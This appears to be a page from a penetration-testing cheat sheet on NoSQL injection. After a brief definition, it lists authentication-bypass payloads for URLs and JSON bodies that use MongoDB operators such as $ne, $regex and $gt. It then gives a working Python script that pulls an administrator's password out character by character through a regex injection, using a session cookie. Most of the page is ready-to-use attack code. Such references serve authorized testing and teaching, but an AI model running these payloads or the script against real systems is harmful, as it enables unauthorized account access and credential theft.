NoSQL injection

NoSQL injection is a vulnerability where an attacker is able to interfere with the queries that an application makes to a NoSQL database. NoSQL injection may enable an attacker to:

  • Bypass authentication or protection mechanisms.

  • Extract or edit data.

  • Cause a denial of service.

  • Execute code on the server.

Auth bypass

#in URL
username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true

#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }

Regex to bypass

{
   "username":{
      "$regex":"^admi*"
   },
   "password":{
      "$ne":"^.*"
   }
}

Exfiltrate password using regex script

import requests

# Base URL for the target
base_url = "https://tareget.com/user/lookup"

# Session cookie (modify this with your actual session cookie)
cookies = {
    'session': 'COOKIE_HERE',
}

# Characters to test (extend this as needed)
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

# Starting point for the password
password = ""

# Function to test a given prefix
def test_prefix(prefix):
    injection = f"?user=administrator'+%26%26+this.password+%26%26+this.password.match(/^{prefix}.*$/)%00"
    params = {'user': injection}
    inject = base_url + injection
    response = requests.get(inject, cookies=cookies)
    return "administrator" in response.text

# Iteratively build the password
while True:
    found_char = False
    for char in characters:
        test_pass = password + char
        if test_prefix(test_pass):
            password += char
            print(f"Found character: {char} -> Current password: {password}")
            found_char = True
            break
    if not found_char:
        print("Password extraction complete!")
        break

print(f"The password is: {password}")
PreviousServer Side Template InjectionNextXXE

Last updated